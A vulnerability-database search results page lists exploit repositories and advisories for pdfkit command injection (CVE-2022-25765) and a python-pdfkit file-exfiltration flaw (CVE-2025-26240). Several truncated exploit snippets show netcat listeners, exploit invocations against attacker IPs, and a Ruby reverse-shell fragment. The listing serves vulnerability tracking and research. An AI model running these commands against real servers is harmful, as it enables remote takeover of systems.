Lucene search
+L

93 matches found

Kitploit
Kitploit
added 2026/09/15 8:22 p.m.4 views

CVE-2022-25765-exploit

CVE-2022-25765 — pdfkit 中的命令注入 描述 CVE-2022-25765 是一个影响 pdfkit (Ruby gem) 0.8.7.2 版本的命令注入 (Command Injection)漏洞。该漏洞严重性为 CRITICAL ,CVSS 评分为 9.8,因为其允许在无需身份验证的情况下远程执行命令。 问题在于 pdfkit 将 url 参数直接传递给 shell,而未进行任何清理。该库在内部通过类似以下命令执行 wkhtmltopdf: root@kitploit: system"wkhtmltopdf --quiet ... 'url' output.pd...

9.8CVSS8.5AI score0.42961EPSS
SaveExploits12References4
Kitploit
Kitploit
added 2026/09/15 7:21 p.m.6 views

exploit-CVE-2022-25765

CVE-2022-25765 pdfkit 漏洞利用 - 命令注入 喜欢这个仓库吗?给我们一个 ⭐! 仅用于教育和授权的安全研究目的。 漏洞利用作者 @UNICORDev 由 @NicPWNs 和 @Dev-Yeoj 编写 漏洞描述 pdfkit 包从 0.0.0 版本起即存在命令注入漏洞,因为其 URL 未被正确清理。 漏洞利用说明 Ruby gem pdfkit 通常用于将网站或 HTML 转换为 PDF 文档。该软件存在漏洞的版本( python3 exploit-CVE-2022–25765.py -s python3 exploit-CVE-2022–25765.py -c -...

9.8CVSS8.4AI score0.42961EPSS
SaveExploits12References3
Kitploit
Kitploit
added 2026/09/15 6:31 p.m.5 views

PDFkit-CMD-Injection-CVE-2022-25765

PDFkit-CMD-Injection CVE-2022-25765 针对 pdfkit 0.8.6 中 CVE-2022-25765 命令注入漏洞的利用工具 关于该漏洞的更多详细信息,请参见此处 PoC 在您的主机上运行 netcat: root@kitploit: $ nc -lvnp 1337 运行利用工具(示例): root@kitploit: $ ./CVE-2022-25765.py -t http://localhost -a 10.10.14.122 -p 1337 Input target address is http://localhost Input addre...

9.8CVSS8.4AI score0.42961EPSS
SaveExploits12
Kitploit
Kitploit
added 2026/09/15 5:14 a.m.7 views

PDFkit-CMD-Injection

PDFkit-CMD-Injection 命令注入漏洞 CVE-2022-25765 pdfkit 0.8.6 命令注入漏洞。 pdfkit 包容易受到命令注入攻击,原因是 URL 未进行适当清理。 注意:该问题已在 0.8.7.2 中修补,但后来发现该修补无效。更新后的修补版本为 0.8.7.2。 PoC 启动一个 HTTP 服务器 root@kitploit: python3 -m http.server 80 启动一个 netcat 监听器 root@kitploit: nc -nlvp 4444 使用 CURL 发送请求 root@kitploit: curl...

9.8CVSS8.4AI score0.42961EPSS
SaveExploits12
Kitploit
Kitploit
added 2026/09/15 3:29 a.m.4 views

CVE-2022-25765-pdfkit-Exploit-Reverse-Shell

CVE-2022-25765-pdfkit-漏洞利用-反弹Shell pdfkit TCPSocket.new"LOCAL-IP",LOCAL-LISTEN-PORT' 通过 CURL(修改粗体 值): curl 'TARGET-URL ' -X POST -H 'User-Agent: Mozilla/5.0 X11; Linux x8664; rv:102.0 Gecko/20100101 Firefox/102.0' -H 'Accept:...

9.8CVSS8.2AI score0.42961EPSS
SaveExploits12
Kitploit
Kitploit
added 2026/09/14 11:05 p.m.11 views

PDFKitExploit

此存储库没有 README。...

5.7AI score
SaveExploits0
Kitploit
Kitploit
added 2026/09/12 5:09 a.m.7 views

CVE-2022-25765

CVE-2022-25765 漏洞利用 针对 CVE-2022-25765(PDFkit 命令注入)的小型 PoC 漏洞利用 使用方法 1. 在攻击机器上启动 netcat 监听器: root@kitploit: nc -lvnp 4444 2. 运行漏洞利用程序: root@kitploit: python cve-2022-25765.py -t http://目标IP:端口 -l 你的IP -p 你的端口 示例: root@kitploit: python cve-2022-25765.py -t http://10.40.11.43:80 -l 10.10.14.12 -p 44...

9.8CVSS8.4AI score0.42961EPSS
SaveExploits12References2
Kitploit
Kitploit
added 2026/09/11 11:40 p.m.8 views

PDFkit-CMD-Injection

PDFkit-CMD-Injection CVE-2022-25765 Detalle Descripción El paquete pdfkit desde 0.0.0 es vulnerable a Inyección de Comandos donde la URL no está debidamente saneada. PoC Iniciar un servidor HTTP root@kitploit: 1- python3 -m http.server 80 Iniciar un listener de netcat root@kitploit: 2- nc -lnvp...

9.8CVSS8.4AI score0.42961EPSS
SaveExploits12
Kitploit
Kitploit
added 2026/09/09 1:39 p.m.9 views

CVE-2022-25765

CVE-2022-25765 — pdfkit CVE-2022-25765 的 PoC,影响存在漏洞的 pdfkit 版本。 已在 pdfkit 0.8.6 上测试。 环境要求 Python 3.x requests colorama 安装依赖: root@kitploit: pip3 install -r requirements.txt 或手动安装: root@kitploit: pip3 install requests colorama 使用方法 root@kitploit: python3 exploit2.py -u -l -p 示例: 启动监听器 root@kitploi...

9.8CVSS8.5AI score0.42961EPSS
SaveExploits12
Kitploit
Kitploit
added 2026/09/09 10:11 a.m.8 views

CVE-2025-26240

CVE-2025-26240 Este es un código de prueba de concepto para la explotación del método fromstring de pdfkit. Contiene un payload sencillo que demuestra tanto LFI como SSRF...

8.4CVSS5.9AI score0.00392EPSS
SaveExploits0
OSV
OSV
added 2026/07/13 3:46 p.m.15 views

PYSEC-2026-2860 pdfkit: Path traversal in from_string

In JazzCore python-pdfkit 1.0.0, the fromstring method enables the execution of JavaScript code within the context of the server application and the exfiltration of local files...

8.4CVSS6.2AI score0.00392EPSS
SaveExploits0References6
Tenable Nessus
Tenable Nessus
added 2026/06/22 12:00 a.m.15 views

Linux Distros Unpatched Vulnerability : CVE-2025-26240

The Linux/Unix host has one or more packages installed that are impacted by a vulnerability without a vendor supplied patch available. - In JazzCore python-pdfkit 1.0.0, the fromstring method enables the execution of JavaScript code within the context of the server application and the exfiltratio...

8.4CVSS5.8AI score0.00392EPSS
SaveExploits0References3
OSV
OSV
added 2026/06/17 6:35 p.m.24 views

GHSA-9G3X-6X24-VF9F pdfkit: Path traversal in from_string

In JazzCore python-pdfkit 1.0.0, the fromstring method enables the execution of JavaScript code within the context of the server application and the exfiltration of local files...

8.4CVSS5.5AI score0.00392EPSS
SaveExploits0References4
vulnersOsv
vulnersOsv
added 2026/06/17 6:35 p.m.7 views

a2grunnerp (>=0.1.0, <=0.1.8), agentfoundry (>=1.3.9, <=1.5.86) +221 more potentially affected by CVE-2025-26240 via pdfkit (>=0.6.0, <=1.0.0)

pdfkit PYPI version =0.6.0, =0.1.0, =1.3.9, =1.2.0, =1.1.3, =0.1.35, =0.1.0, =0.1.0, =0.0.1, =0.0.1, =0.5.3, =0.5.5, =0.1.17, =0.1.23 and more Source cves: CVE-2025-26240 Source advisory: SNYK:PYTHON-PDFKIT-17391903...

8.4CVSS5.3AI score0.00392EPSS
SaveExploits0
NVD
NVD
added 2026/06/17 5:16 p.m.43 views

CVE-2025-26240

In JazzCore python-pdfkit 1.0.0, the fromstring method enables the execution of JavaScript code within the context of the server application and the exfiltration of local files...

8.4CVSS0.00392EPSS
SaveExploits0References2
OSV
OSV
added 2026/06/17 5:16 p.m.15 views

DEBIAN-CVE-2025-26240

In JazzCore python-pdfkit 1.0.0, the fromstring method enables the execution of JavaScript code within the context of the server application and the exfiltration of local files...

8.4CVSS6AI score0.00392EPSS
SaveExploits0References1
UbuntuCve
UbuntuCve
added 2026/06/17 5:16 p.m.22 views

CVE-2025-26240

In JazzCore python-pdfkit 1.0.0, the fromstring method enables the execution of JavaScript code within the context of the server application and the exfiltration of local files...

8.4CVSS5.3AI score0.00392EPSS
SaveExploits0References2
OSV
OSV
added 2026/06/17 5:16 p.m.17 views

UBUNTU-CVE-2025-26240

In JazzCore python-pdfkit 1.0.0, the fromstring method enables the execution of JavaScript code within the context of the server application and the exfiltration of local files...

8.4CVSS6AI score0.00392EPSS
SaveExploits0References3
Cvelist
Cvelist
added 2026/06/17 12:00 a.m.54 views

CVE-2025-26240

In JazzCore python-pdfkit 1.0.0, the fromstring method enables the execution of JavaScript code within the context of the server application and the exfiltration of local files...

0.00392EPSS
SaveExploits0References2
Positive Technologies
Positive Technologies
added 2026/06/17 12:00 a.m.42 views

PT-2026-50449

Name of the Vulnerable Software and Affected Versions JazzCore python-pdfkit version 1.0.0 Description The from string function allows the execution of JavaScript code within the server application context, which can lead to the exfiltration of local files. Recommendations At the moment, there is...

8.4CVSS6AI score0.00392EPSS
SaveExploits0References11
Rows per page
Query Builder